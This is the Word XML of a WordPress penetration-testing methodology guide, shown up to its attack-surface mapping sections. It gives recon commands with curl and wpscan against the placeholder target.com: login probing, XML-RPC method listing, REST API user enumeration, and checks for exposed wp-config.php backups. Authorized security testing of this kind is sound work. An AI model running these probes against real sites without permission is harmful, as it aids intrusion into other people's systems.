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Professional WordPress Penetration Testing Methodology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GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Complete Step-by-Step Guide for Authorized Engagements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="00C0369D" w:rsidP="001B03AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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pict>
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>1. PRE-ENGAGEMENT &amp; MINDSET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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>1.1 Understanding "Full Permission" in Practice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b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>What Authorization Actually Means:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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You have written, signed authorization to test the specific WordPress site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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 xml:space="preserve">The Rules of Engagement (RoE) document defines: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Scope (exact domains/IPs)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Permitted testing hours</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Excluded systems/actions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Emergency contacts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Data handling requirements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b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Critical Reality Check:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Authorization ≠ carte blanche to be reckless</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Client infrastructure may be shared (hosting, CDN, databases)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Third-party services (payment gateways, APIs) are typically OUT OF SCOPE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Mock data doesn't mean the server architecture is disposable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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>1.2 Acceptable vs Unnecessary Exploitation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ACCEPTABLE (for PoC):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✓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Creating test users with low privileges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✓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Uploading harmless test files (txt, jpg) to prove upload vulns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✓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Reading wp-config.php to show exposure (don't exfiltrate actual credentials to your machine)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✓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Demonstrating XSS with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alert(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 or simple PoC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✓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Limited SQL injection to prove vulnerability (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e.g.,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UNION SELECT to show database name)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✓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Exploiting a plugin vuln to create a draft post or comment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✓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Testing XML-RPC pingback against a server YOU control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UNNECESSARY/PROHIBITED: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✗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Brute-forcing beyond 10-20 attempts (you're proving detection, not cracking passwords)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lastRenderedPageBreak/>
        <w:t>✗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Uploading actual web shells unless explicitly discussed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✗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Modifying production content visible to real users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✗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Exfiltrating customer data, even if mock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✗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DoS attacks (even if authorized, prove concept with 1-2 requests)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✗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Lateral movement to internal networks without explicit scope expansion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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="383A42"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>✗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Testing third-party plugins that aren't hosted on the target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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>1.3 Avoiding False Positives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Common Junior Mistakes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Scanner Says Vuln = Vuln</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">: WPScan flags aren't always applicable </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Version detected may be wrong</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Patch may have been backported</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Vulnerability may require conditions not present</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Manual Verification is Mandatory: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eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang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</w:t>
      </w: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WPScan says: "Plugin X v1.2 - SQL Injection (CVE-2023-XXXXX)"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</w:t>
      </w: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You MUST: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1.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Confirm plugin version manually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2.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Read the actual CVE details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3.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Test the specific endpoint/parameter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00C0369D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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C0369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4.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C0369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Verify the injection actually works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Rate Limiting ≠ Security:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Just because you're rate-limited doesn't mean brute-force is impossible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Conversely, lack of rate limiting doesn't always mean vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Severity Inflation:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Low-privilege XSS in an admin-only field ≠ Critical</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Information disclosure of WordPress version ≠ High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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>1.4 Evidence Collection Standards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For EVERY Finding, Collect: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1.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Raw HTTP Request/Response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Save Burp Suite requests or use curl with verbose output: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 -X POST https://target.com/wp-login.php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"log=admin&amp;pwd=test"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--output response.html </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:color w:val="E45649"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>2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1B03AE">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:color w:val="E45649"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>&amp;1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tee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evidence_login_bruteforce.txt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2.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Screenshot Requirements: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lastRenderedPageBreak/>
        <w:t># - Full URL visible in browser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Timestamp visible (browser clock or 'date' command in terminal)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Clear demonstration of vulnerability impact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Before/after states for modifications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3.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Command Output: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Always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save full output, not just summary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wpscan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--url https://target.com --enumerate ap --plugins-detection aggressive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wpscan_full_output.txt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4.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Video for Complex Exploits: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Use asciinema for terminal, OBS for GUI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asciinema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rec wordpress_rce_poc.cast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**Evidence Naming Convention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`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YYYYMMDD_HHMM_target-domain_finding-type_sequence.ext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Examples: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20260114_1430_target-com_xmlrpc-bruteforce_01.txt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20260114_1445_target-com_plugin-sqli_burp-request.txt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20260114_1450_target-com_xss-stored_screenshot.png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 xml:space="preserve">Documentation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>During</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Testing:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keep a running log: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Create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engagement directory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mkdir</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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-p ~/pentests/wordpress-target-com/evidence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cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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~/pentests/wordpress-target-com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Maintain a testing log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testing_log.md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&lt;&lt;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'EOF'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# WordPress Penetration Test - target.com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Date: 2026-01-14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Tester: [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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Your</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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Name]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## Timeline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- 14:00 - Initial reconnaissance started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- 14:15 - WordPress confirmed, version 6.4.2 detected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- 14:30 - XML-RPC enabled, testing methods...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## Findings Summary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1. XML-RPC enabled with system.listMethods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2. User enumeration via REST API (3 users found)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3. ...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## Questions for Client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1. Is XML-RPC functionality required?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2. ...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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="00C0369D" w:rsidP="001B03AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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pict>
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>2. WORDPRESS IDENTIFICATION &amp; FINGERPRINTING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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>2.1 Initial Detection: Is This WordPress?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Step 1: Passive Reconnaissance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Check DNS, hosting, technologies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-sI https://target.com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server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-sI https://target.com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x-powered-by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Common WordPress indicators in headers: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Link: &lt;https://target.com/wp-json/&gt;; rel="https://api.w.org/"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X-Powered-By: PHP/x.x.x (not definitive, but common)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Step 2: HTML Source Analysis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Fetch homepage and search for WordPress signatures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wordpress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Look for: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&lt;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meta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name="generator" content="WordPress X.X.X" /&gt;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- wp-content/,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wp-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includes/ in paths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/wp-json/ endpoints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- &lt;!--[if lt IE 9]&gt; with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wp-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includes paths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Step 3: Common WordPress Paths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lastRenderedPageBreak/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Test for standard WordPress files/directories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for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path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in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wp-login.php wp-admin xmlrpc.php wp-json readme.html license.txt; </w:t>
      </w:r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"Testing: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$path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-o /dev/null -w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"%{http_code} -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$path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\n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https://target.com/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$path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done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Expected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results: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200 - wp-login.php (redirects to login page)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302 - wp-admin (redirects to wp-login.php)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405 -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xmlrpc.php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(if enabled but GET not allowed)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200 - wp-json (REST API index)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200 -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readme.html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(common but should be removed)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Evidence to Collect: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Save full homepage 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 -o evidence/01_homepage.html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Save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headers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-sI https://target.com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evidence/02_headers.txt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Screenshot homepage with view-source showing WordPress indicators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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>2.2 Version Detection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Method 1: Meta Generator Tag (Least Reliable)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'meta name="generator"'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Example: &lt;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meta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name="generator" content="WordPress 6.4.2" /&gt;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NOTE: Many sites remove this for security through obscurity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Method 2: readme.html File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https://target.com/readme.html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"version"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Contains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WordPress version in installation instructions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Example: "Version 6.4.2"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Method 3: RSS Feed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lastRenderedPageBreak/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https://target.com/feed/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generator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Example: &lt;generator&gt;https://wordpress.org/?v=6.4.2&lt;/generator&gt;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Method 4: Static Resource Versioning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Check CSS/JS files for version parameters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-oP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'wp-includes/.*?ver=[\d.]+'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head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-5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Example output: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wp-includes/css/dist/block-library/style.min.css?ver=6.4.2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wp-includes/js/jquery/jquery.min.js?ver=3.7.1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Method 5: Aggressive Fingerprinting with WPScan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wpscan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--url https://target.com --detection-mode aggressive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--no-update -o evidence/wpscan_version_detection.txt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**Version Detection Evidence Table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Create a summary table </w:t>
      </w:r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in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 your notes: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`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Method         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Version Found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Reliability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Notes               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-----------------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---------------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-------------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----------------------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Meta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Generator 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6.4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.2        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Low        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Can be removed      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readme.html    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6.4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.2        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Medium     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Often forgotten     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RSS Feed       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6.4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.2        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Medium     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Hard to fake        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Static Resources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6.4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.2        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High       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Hardcoded </w:t>
      </w:r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in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WP core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WPScan         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6.4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.2        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High       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Multiple fingerprints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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>2.3 Fingerprinting Advanced Techniques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Detect Active Theme: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Method 1: HTML source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-oP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'wp-content/themes/\K[^/]+'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sort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Method 2: CSS file paths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'wp-content/themes'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-oP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'themes/\K[^/]+'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sort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lastRenderedPageBreak/>
        <w:t># Method 3: WPScan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wpscan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--url https://target.com --enumerate t --detection-mode aggressive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Detect Server Configuration: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Check for directory listing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https://target.com/wp-content/plugins/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"index of"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https://target.com/wp-content/uploads/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"index of"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Check for common misconfigurations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for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file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in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wp-config.php.bak wp-config.old .wp-config.php.swp; </w:t>
      </w:r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-o /dev/null -w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"%{http_code} -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$file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\n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https://target.com/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$file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done</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="00C0369D" w:rsidP="001B03AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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pict>
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>3. ATTACK SURFACE MAPPING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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>3.1 wp-login.php Assessment</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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Basic Reconnaissance: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Fetch login page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https://target.com/wp-login.php -o evidence/wp-login.html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Check for custom login URL (some security plugins rename this)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https://target.com/login -o /dev/null -w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"%{http_code}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\n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https://target.com/admin -o /dev/null -w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"%{http_code}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\n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Analyze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response headers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-sI https://target.com/wp-login.php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tee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evidence/wp-login-headers.txt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Look for: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X-Frame-Options (clickjacking protection)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Content-Security-Policy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Rate limiting headers (X-RateLimit-*, Retry-After)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Test Authentication Mechanism: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Test invalid login (observe response)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-X POST https://target.com/wp-login.php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  -d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"log=testuser&amp;pwd=wrongpass&amp;wp-submit=Log+In&amp;redirect_to=https://target.com/wp-admin/&amp;testcookie=1"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-c cookies.txt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evidence/wp-login_failed.html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Check for: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Error message disclosure ("Invalid username" vs "Invalid password")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CAPTCHA requirements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Rate limiting behavior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Account lockout mechanisms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Map Login Features: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Check for password reset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https://target.com/wp-login.php?action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=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lostpassword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evidence/wp-login_lostpassword.html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Check for registration (if enabled)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evidence/wp-login_register.html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Check for logout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evidence/wp-login_logout.html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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>3.2 wp-admin/ Assessment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Directory Access Control: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Test without authentication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-sI https://target.com/wp-admin/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location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Expected: 302 redirect to wp-login.php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Finding: If 200 OK, directory listing or exposure issue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Test admin-ajax.php (should be accessible)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https://target.com/wp-admin/admin-ajax.php -o /dev/null -w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"%{http_code}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\n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Expected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: 400 (Bad Request) or error - it's designed for POST with actions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Common Admin Paths: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lastRenderedPageBreak/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Create a list of admin endpoints to test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admin_endpoints.txt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&lt;&lt;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'EOF'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/wp-admin/index.php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/wp-admin/admin-ajax.php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/wp-admin/admin-post.php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/wp-admin/users.php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/wp-admin/plugins.php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/wp-admin/themes.php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/wp-admin/options-general.php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/wp-admin/install.php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EOF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Test each endpoint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while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read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endpoint; </w:t>
      </w:r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code</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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=$(curl -s -o /dev/null -w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"%{http_code}"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 https://target.com$endpoint)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$code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-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$endpoint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done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admin_endpoints.txt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tee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evidence/admin_endpoint_scan.txt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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>3.3 xmlrpc.php Full Mapping</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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Detection: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Test if XML-RPC is enabled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-X POST https://target.com/xmlrpc.php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-H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"Content-Type: text/xml"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'&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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?xml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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version="1.0"?&gt;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methodCall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methodName&gt;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system.listMethods&lt;/methodName&gt;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params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&gt;&lt;/params&gt;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&lt;/methodCall&gt;'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tee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evidence/xmlrpc_detection.xml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Expected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responses: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XML response with method list = ENABLED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HTTP 405 Method Not Allowed = DISABLED via server config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- 403 Forbidden = DISABLED via security plugin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Connection refused/timeout = Blocked at firewall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Severity Assessment:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> If enabled, determine risk level:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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INFO</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>: Enabled but with strong authentication controls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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lastRenderedPageBreak/>
        <w:t>LOW</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>: Enabled, limited methods, no sensitive functionality</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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MEDIUM</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>: Enabled with pingback, user enumeration possible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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HIGH</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>: Enabled with brute-force amplification, no rate limiting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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>3.4 REST API (wp-json) Mapping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Discovery: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Fetch API index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https://target.com/wp-json/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jq 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.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evidence/rest_api_index.json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Key endpoints to note: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/wp-json/wp/v2/users - User enumeration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/wp-json/wp/v2/posts - Public posts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/wp-json/wp/v2/comments - Comments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/wp-json/wp/v2/media - Media files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Test User Endpoint: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Enumerate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users via REST API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https://target.com/wp-json/wp/v2/users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jq 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.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evidence/rest_api_users.json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Expected: List of users with IDs, names, slugs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If empty array: User enumeration disabled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error: REST API restricted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Test Authentication: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Try to access authenticated endpoints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https://target.com/wp-json/wp/v2/users/me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-H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"Authorization: Bearer INVALID_TOKEN"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jq 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.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Test for exposed sensitive endpoints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https://target.com/wp-json/wp/v2/settings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jq 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.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Map Custom Endpoints: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List all registered routes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https://target.com/wp-json/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jq -r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'.routes | keys[]'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sort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evidence/rest_api_routes.txt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lastRenderedPageBreak/>
        <w:t># Look for custom plugin/theme endpoints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"^/wp/"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evidence/rest_api_routes.txt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evidence/custom_routes.txt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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 Plugin Directory </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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Passive Detection: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Extract plugin names from HTML source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-oP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'wp-content/plugins/\K[^/]+'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sort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evidence/plugins_passive.txt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Common locations to check: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HTML source (scripts, stylesheets)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README files: /wp-content/plugins/PLUGIN_NAME/readme.txt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CSS/JS files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Active Enumeration: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Check for directory listing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https://target.com/wp-content/plugins/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"index of"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WPScan plugin enumeration (passive)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wpscan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--url https://target.com --enumerate p --detection-mode passive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evidence/wpscan_plugins_passive.txt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WPScan plugin enumeration (aggressive) - only with permission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wpscan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--url https://target.com --enumerate ap --detection-mode aggressive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--plugins-detection aggressive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evidence/wpscan_plugins_aggressive.txt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Manual Plugin Version Detection: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For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each discovered plugin, check readme.txt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plugin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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=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"contact-form-7"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Example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https://target.com/wp-content/plugins/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$plugin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/readme.txt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"stable tag"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Check main plugin PHP file for version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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https://target.com/wp-content/plugins/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$plugin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$plugin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.php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"version"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0369D" w:rsidRDefault="00C0369D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</w:p>
    <w:p w:rsidR="00C0369D" w:rsidRPr="001B03AE" w:rsidRDefault="00C0369D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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.6 Theme Directory Enumeration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Detect Active Theme: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From HTML source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-oP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'wp-content/themes/\K[^/]+'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head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-1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Check theme style.css for version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theme</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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=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"twentytwentyfour"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Example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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https://target.com/wp-content/themes/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$theme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/style.css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head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-20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version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0369D" w:rsidRPr="001B03AE" w:rsidRDefault="00C0369D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Enumerate Available Themes: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Check for directory listing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https://target.com/wp-content/themes/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"index of"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WPScan theme enumeration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wpscan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--url https://target.com --enumerate t --detection-mode aggressive \</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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evidence/wpscan_themes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0369D" w:rsidRPr="001B03AE" w:rsidRDefault="00C0369D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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
